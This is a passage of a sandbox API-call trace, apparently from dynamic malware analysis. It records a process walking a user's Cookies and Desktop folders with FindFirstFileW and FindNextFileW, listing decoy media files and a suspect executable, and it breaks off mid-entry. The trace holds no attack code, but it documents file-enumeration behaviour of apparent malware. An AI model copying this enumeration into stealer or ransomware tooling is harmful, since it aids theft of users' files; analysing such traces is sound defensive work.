HALPmcxz\\Cookies\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0056.390] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261948 | out: hHeap=0x660000) returned 1 [0056.390] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.390] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0056.390] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.391] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0056.391] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.391] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.391] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.391] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.391] PathFindFileNameW (pszPath="") returned="" [0056.391] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb331210, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0xb331210, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.391] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261948 | out: hHeap=0x660000) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb331210, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0xb331210, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89363db0, ftCreationTime.dwHighDateTime=0x1d4ce17, ftLastAccessTime.dwLowDateTime=0x953570b0, ftLastAccessTime.dwHighDateTime=0x1d4cca3, ftLastWriteTime.dwLowDateTime=0x953570b0, ftLastWriteTime.dwHighDateTime=0x1d4cca3, nFileSizeHigh=0x0, nFileSizeLow=0x1840e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1jqP 8uN4qhj8sMm4.flv", cAlternateFileName="1JQP8U~1.FLV")) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc40c02d0, ftCreationTime.dwHighDateTime=0x1d4c6ec, ftLastAccessTime.dwLowDateTime=0x4ad91180, ftLastAccessTime.dwHighDateTime=0x1d4cf9a, ftLastWriteTime.dwLowDateTime=0x4ad91180, ftLastWriteTime.dwHighDateTime=0x1d4cf9a, nFileSizeHigh=0x0, nFileSizeLow=0xda90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1Zw20eF9M7.mp4", cAlternateFileName="1ZW20E~1.MP4")) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9b17e0, ftCreationTime.dwHighDateTime=0x1d4d455, ftLastAccessTime.dwLowDateTime=0x31724950, ftLastAccessTime.dwHighDateTime=0x1d4c7f7, ftLastWriteTime.dwLowDateTime=0x31724950, ftLastWriteTime.dwHighDateTime=0x1d4c7f7, nFileSizeHigh=0x0, nFileSizeLow=0x3974, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1zXBPnB.gif", cAlternateFileName="")) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4cdc390, ftCreationTime.dwHighDateTime=0x1d4d3f5, ftLastAccessTime.dwLowDateTime=0xabb3d040, ftLastAccessTime.dwHighDateTime=0x1d4d499, ftLastWriteTime.dwLowDateTime=0xabb3d040, ftLastWriteTime.dwHighDateTime=0x1d4d499, nFileSizeHigh=0x0, nFileSizeLow=0x9674, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4UyQPASLT.wav", cAlternateFileName="4UYQPA~1.WAV")) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fa827e0, ftCreationTime.dwHighDateTime=0x1d4cff8, ftLastAccessTime.dwLowDateTime=0xb151e5d0, ftLastAccessTime.dwHighDateTime=0x1d4c55a, ftLastWriteTime.dwLowDateTime=0xb151e5d0, ftLastWriteTime.dwHighDateTime=0x1d4c55a, nFileSizeHigh=0x0, nFileSizeLow=0xbd8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5VDyYw1.m4a", cAlternateFileName="")) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb751d30, ftCreationTime.dwHighDateTime=0x1d4cb22, ftLastAccessTime.dwLowDateTime=0x93643bf0, ftLastAccessTime.dwHighDateTime=0x1d4d36e, ftLastWriteTime.dwLowDateTime=0x93643bf0, ftLastWriteTime.dwHighDateTime=0x1d4d36e, nFileSizeHigh=0x0, nFileSizeLow=0x10cf1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="60uV9dxrIvRWJYpX2.pps", cAlternateFileName="60UV9D~1.PPS")) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b852ad0, ftCreationTime.dwHighDateTime=0x1d4c65d, ftLastAccessTime.dwLowDateTime=0xac0c5a10, ftLastAccessTime.dwHighDateTime=0x1d4c5ff, ftLastWriteTime.dwLowDateTime=0xac0c5a10, ftLastWriteTime.dwHighDateTime=0x1d4c5ff, nFileSizeHigh=0x0, nFileSizeLow=0xa444, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6NumCnon.pps", cAlternateFileName="")) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0d06ee0, ftCreationTime.dwHighDateTime=0x1d4d402, ftLastAccessTime.dwLowDateTime=0x35623c00, ftLastAccessTime.dwHighDateTime=0x1d4d48b, ftLastWriteTime.dwLowDateTime=0x35623c00, ftLastWriteTime.dwHighDateTime=0x1d4d48b, nFileSizeHigh=0x0, nFileSizeLow=0xa454, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8Ky0ltRrnhjM32N.png", cAlternateFileName="8KY0LT~1.PNG")) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bb8c420, ftCreationTime.dwHighDateTime=0x1d4cf8f, ftLastAccessTime.dwLowDateTime=0x808bf300, ftLastAccessTime.dwHighDateTime=0x1d4ce83, ftLastWriteTime.dwLowDateTime=0x808bf300, ftLastWriteTime.dwHighDateTime=0x1d4ce83, nFileSizeHigh=0x0, nFileSizeLow=0xae05, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8XYY enP9O0YVVimx1.mp3", cAlternateFileName="8XYYEN~1.MP3")) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb9af730, ftCreationTime.dwHighDateTime=0x1d4d0ac, ftLastAccessTime.dwLowDateTime=0xa1b0df30, ftLastAccessTime.dwHighDateTime=0x1d4d1eb, ftLastWriteTime.dwLowDateTime=0xa1b0df30, ftLastWriteTime.dwHighDateTime=0x1d4d1eb, nFileSizeHigh=0x0, nFileSizeLow=0x15f2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9Md r.swf", cAlternateFileName="9MDR~1.SWF")) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74880ca0, ftCreationTime.dwHighDateTime=0x1d4d28a, ftLastAccessTime.dwLowDateTime=0x172abcb0, ftLastAccessTime.dwHighDateTime=0x1d4d39d, ftLastWriteTime.dwLowDateTime=0x172abcb0, ftLastWriteTime.dwHighDateTime=0x1d4d39d, nFileSizeHigh=0x0, nFileSizeLow=0x1233d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9REu6C.m4a", cAlternateFileName="")) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x384de1e0, ftCreationTime.dwHighDateTime=0x1d4cad5, ftLastAccessTime.dwLowDateTime=0x98131ff0, ftLastAccessTime.dwHighDateTime=0x1d4c576, ftLastWriteTime.dwLowDateTime=0x98131ff0, ftLastWriteTime.dwHighDateTime=0x1d4c576, nFileSizeHigh=0x0, nFileSizeLow=0x68be, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aRT3ou.jpg", cAlternateFileName="")) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b11c220, ftCreationTime.dwHighDateTime=0x1d4d570, ftLastAccessTime.dwLowDateTime=0xa72b1130, ftLastAccessTime.dwHighDateTime=0x1d4c65e, ftLastWriteTime.dwLowDateTime=0xa72b1130, ftLastWriteTime.dwHighDateTime=0x1d4c65e, nFileSizeHigh=0x0, nFileSizeLow=0xf7db, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bSgKDO2SM-AQU.mp3", cAlternateFileName="BSGKDO~1.MP3")) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92bd4f20, ftCreationTime.dwHighDateTime=0x1d4cc7f, ftLastAccessTime.dwLowDateTime=0x947af260, ftLastAccessTime.dwHighDateTime=0x1d4c755, ftLastWriteTime.dwLowDateTime=0x947af260, ftLastWriteTime.dwHighDateTime=0x1d4c755, nFileSizeHigh=0x0, nFileSizeLow=0x107a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cxkxIuDq.m4a", cAlternateFileName="")) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x557a36c0, ftCreationTime.dwHighDateTime=0x1d4d2ea, ftLastAccessTime.dwLowDateTime=0xcaaf2bb0, ftLastAccessTime.dwHighDateTime=0x1d4d54e, ftLastWriteTime.dwLowDateTime=0xcaaf2bb0, ftLastWriteTime.dwHighDateTime=0x1d4d54e, nFileSizeHigh=0x0, nFileSizeLow=0x5826, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="faub8t.flv", cAlternateFileName="")) returned 1 [0056.391] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaa128e0, ftCreationTime.dwHighDateTime=0x1d4c969, ftLastAccessTime.dwLowDateTime=0x54f95d30, ftLastAccessTime.dwHighDateTime=0x1d4cc77, ftLastWriteTime.dwLowDateTime=0x54f95d30, ftLastWriteTime.dwHighDateTime=0x1d4cc77, nFileSizeHigh=0x0, nFileSizeLow=0xc34a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FhecmqmUmuGofO.jpg", cAlternateFileName="FHECMQ~1.JPG")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6564ae30, ftCreationTime.dwHighDateTime=0x1d4c674, ftLastAccessTime.dwLowDateTime=0x4d1e2720, ftLastAccessTime.dwHighDateTime=0x1d4c534, ftLastWriteTime.dwLowDateTime=0x4d1e2720, ftLastWriteTime.dwHighDateTime=0x1d4c534, nFileSizeHigh=0x0, nFileSizeLow=0xf50d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FqC7oKr9X-T-xlLzFbdd.jpg", cAlternateFileName="FQC7OK~1.JPG")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c601c50, ftCreationTime.dwHighDateTime=0x1d4d53c, ftLastAccessTime.dwLowDateTime=0xb3f380, ftLastAccessTime.dwHighDateTime=0x1d4c69f, ftLastWriteTime.dwLowDateTime=0xb3f380, ftLastWriteTime.dwHighDateTime=0x1d4c69f, nFileSizeHigh=0x0, nFileSizeLow=0xb9d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gRPeD.m4a", cAlternateFileName="")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf479ec30, ftCreationTime.dwHighDateTime=0x1d4c998, ftLastAccessTime.dwLowDateTime=0x28ff8720, ftLastAccessTime.dwHighDateTime=0x1d4d06b, ftLastWriteTime.dwLowDateTime=0x28ff8720, ftLastWriteTime.dwHighDateTime=0x1d4d06b, nFileSizeHigh=0x0, nFileSizeLow=0x12200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H 5zj6wBswdjjTMij-.mp3", cAlternateFileName="H5ZJ6W~1.MP3")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88bab7e0, ftCreationTime.dwHighDateTime=0x1d4c83f, ftLastAccessTime.dwLowDateTime=0xedf42820, ftLastAccessTime.dwHighDateTime=0x1d4c8a4, ftLastWriteTime.dwLowDateTime=0xedf42820, ftLastWriteTime.dwHighDateTime=0x1d4c8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc514, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h5XCQ.mkv", cAlternateFileName="")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9f64460, ftCreationTime.dwHighDateTime=0x1d4d280, ftLastAccessTime.dwLowDateTime=0x8c733cb0, ftLastAccessTime.dwHighDateTime=0x1d4cb58, ftLastWriteTime.dwLowDateTime=0x8c733cb0, ftLastWriteTime.dwHighDateTime=0x1d4cb58, nFileSizeHigh=0x0, nFileSizeLow=0x79e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I9YVy1.mp3", cAlternateFileName="")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x150300c0, ftCreationTime.dwHighDateTime=0x1d4c8d3, ftLastAccessTime.dwLowDateTime=0xd492d060, ftLastAccessTime.dwHighDateTime=0x1d4d2d7, ftLastWriteTime.dwLowDateTime=0xd492d060, ftLastWriteTime.dwHighDateTime=0x1d4d2d7, nFileSizeHigh=0x0, nFileSizeLow=0xaf64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IiDoDihC33qoyQYC.avi", cAlternateFileName="IIDODI~1.AVI")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc4e13d0, ftCreationTime.dwHighDateTime=0x1d4c696, ftLastAccessTime.dwLowDateTime=0x7e00560, ftLastAccessTime.dwHighDateTime=0x1d4c922, ftLastWriteTime.dwLowDateTime=0x7e00560, ftLastWriteTime.dwHighDateTime=0x1d4c922, nFileSizeHigh=0x0, nFileSizeLow=0x3ce0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jJW2khyR pNShGfzK.flv", cAlternateFileName="JJW2KH~1.FLV")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70cf0f40, ftCreationTime.dwHighDateTime=0x1d4ca66, ftLastAccessTime.dwLowDateTime=0x62315280, ftLastAccessTime.dwHighDateTime=0x1d4c93b, ftLastWriteTime.dwLowDateTime=0x62315280, ftLastWriteTime.dwHighDateTime=0x1d4c93b, nFileSizeHigh=0x0, nFileSizeLow=0x9625, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MKAZ57ez4L.mp3", cAlternateFileName="MKAZ57~1.MP3")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcebe94b0, ftCreationTime.dwHighDateTime=0x1d4d275, ftLastAccessTime.dwLowDateTime=0xdff02520, ftLastAccessTime.dwHighDateTime=0x1d4d2c3, ftLastWriteTime.dwLowDateTime=0xdff02520, ftLastWriteTime.dwHighDateTime=0x1d4d2c3, nFileSizeHigh=0x0, nFileSizeLow=0xb1df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NPYvWKI6z.rtf", cAlternateFileName="NPYVWK~1.RTF")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46ed7210, ftCreationTime.dwHighDateTime=0x1d4d250, ftLastAccessTime.dwLowDateTime=0x2c5f7080, ftLastAccessTime.dwHighDateTime=0x1d4cac4, ftLastWriteTime.dwLowDateTime=0x2c5f7080, ftLastWriteTime.dwHighDateTime=0x1d4cac4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NxkfKpMd", cAlternateFileName="")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38f90f90, ftCreationTime.dwHighDateTime=0x1d4ce02, ftLastAccessTime.dwLowDateTime=0x4ada5fa0, ftLastAccessTime.dwHighDateTime=0x1d4d340, ftLastWriteTime.dwLowDateTime=0x4ada5fa0, ftLastWriteTime.dwHighDateTime=0x1d4d340, nFileSizeHigh=0x0, nFileSizeLow=0x1d80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oQo1_q.jpg", cAlternateFileName="")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78fa2ba0, ftCreationTime.dwHighDateTime=0x1d4cb6a, ftLastAccessTime.dwLowDateTime=0x4591d900, ftLastAccessTime.dwHighDateTime=0x1d4d0f8, ftLastWriteTime.dwLowDateTime=0x4591d900, ftLastWriteTime.dwHighDateTime=0x1d4d0f8, nFileSizeHigh=0x0, nFileSizeLow=0x20b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OvPRD3iWK.png", cAlternateFileName="OVPRD3~1.PNG")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3325580, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x3325580, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1689200, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb7e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="penelop0611_2019-11-06_10-30.exe_.exe", cAlternateFileName="PENELO~1.EXE")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70223930, ftCreationTime.dwHighDateTime=0x1d4c59f, ftLastAccessTime.dwLowDateTime=0x3e9161e0, ftLastAccessTime.dwHighDateTime=0x1d4cb7e, ftLastWriteTime.dwLowDateTime=0x3e9161e0, ftLastWriteTime.dwHighDateTime=0x1d4cb7e, nFileSizeHigh=0x0, nFileSizeLow=0x9714, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PxUe0Rd33Z0Hx10IeT1.avi", cAlternateFileName="PXUE0R~1.AVI")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b199ca0, ftCreationTime.dwHighDateTime=0x1d4c95c, ftLastAccessTime.dwLowDateTime=0x28af6960, ftLastAccessTime.dwHighDateTime=0x1d4d22e, ftLastWriteTime.dwLowDateTime=0x28af6960, ftLastWriteTime.dwHighDateTime=0x1d4d22e, nFileSizeHigh=0x0, nFileSizeLow=0xe990, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PYWZYi4ZS-zguXaIZa.m4a", cAlternateFileName="PYWZYI~1.M4A")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2005db70, ftCreationTime.dwHighDateTime=0x1d4c8a9, ftLastAccessTime.dwLowDateTime=0xf90a9030, ftLastAccessTime.dwHighDateTime=0x1d4cafe, ftLastWriteTime.dwLowDateTime=0xf90a9030, ftLastWriteTime.dwHighDateTime=0x1d4cafe, nFileSizeHigh=0x0, nFileSizeLow=0xdab6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P_559lEWKFJGdNawoW.jpg", cAlternateFileName="P_559L~1.JPG")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64df4910, ftCreationTime.dwHighDateTime=0x1d4c599, ftLastAccessTime.dwLowDateTime=0x63d6a3f0, ftLastAccessTime.dwHighDateTime=0x1d4c59f, ftLastWriteTime.dwLowDateTime=0x63d6a3f0, ftLastWriteTime.dwHighDateTime=0x1d4c59f, nFileSizeHigh=0x0, nFileSizeLow=0x11a1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QXU6sWcq.flv", cAlternateFileName="")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78546840, ftCreationTime.dwHighDateTime=0x1d4c855, ftLastAccessTime.dwLowDateTime=0xc6db8660, ftLastAccessTime.dwHighDateTime=0x1d4d3f9, ftLastWriteTime.dwLowDateTime=0xc6db8660, ftLastWriteTime.dwHighDateTime=0x1d4d3f9, nFileSizeHigh=0x0, nFileSizeLow=0x833c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RrXB-.m4a", cAlternateFileName="")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeca1840, ftCreationTime.dwHighDateTime=0x1d4c729, ftLastAccessTime.dwLowDateTime=0x6ffe2130, ftLastAccessTime.dwHighDateTime=0x1d4d0e9, ftLastWriteTime.dwLowDateTime=0x6ffe2130, ftLastWriteTime.dwHighDateTime=0x1d4d0e9, nFileSizeHigh=0x0, nFileSizeLow=0x16786, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SbEH25_9Y82gEZUNcsj.flv", cAlternateFileName="SBEH25~1.FLV")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe204e7f0, ftCreationTime.dwHighDateTime=0x1d4c568, ftLastAccessTime.dwLowDateTime=0x7121a170, ftLastAccessTime.dwHighDateTime=0x1d4d43d, ftLastWriteTime.dwLowDateTime=0x7121a170, ftLastWriteTime.dwHighDateTime=0x1d4d43d, nFileSizeHigh=0x0, nFileSizeLow=0x1ad3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SzTS.pps", cAlternateFileName="")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59f7c60, ftCreationTime.dwHighDateTime=0x1d4cd21, ftLastAccessTime.dwLowDateTime=0x34f8fc90, ftLastAccessTime.dwHighDateTime=0x1d4c6da, ftLastWriteTime.dwLowDateTime=0x34f8fc90, ftLastWriteTime.dwHighDateTime=0x1d4c6da, nFileSizeHigh=0x0, nFileSizeLow=0x11d98, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U7Qf8.mp4", cAlternateFileName="")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcbeda60, ftCreationTime.dwHighDateTime=0x1d4c9a5, ftLastAccessTime.dwLowDateTime=0x429e60b0, ftLastAccessTime.dwHighDateTime=0x1d4cf86, ftLastWriteTime.dwLowDateTime=0x429e60b0, ftLastWriteTime.dwHighDateTime=0x1d4cf86, nFileSizeHigh=0x0, nFileSizeLow=0x157dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vXRE_K.mp3", cAlternateFileName="")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0c201d0, ftCreationTime.dwHighDateTime=0x1d4c904, ftLastAccessTime.dwLowDateTime=0x42cadd20, ftLastAccessTime.dwHighDateTime=0x1d4cb8f, ftLastWriteTime.dwLowDateTime=0x42cadd20, ftLastWriteTime.dwHighDateTime=0x1d4cb8f, 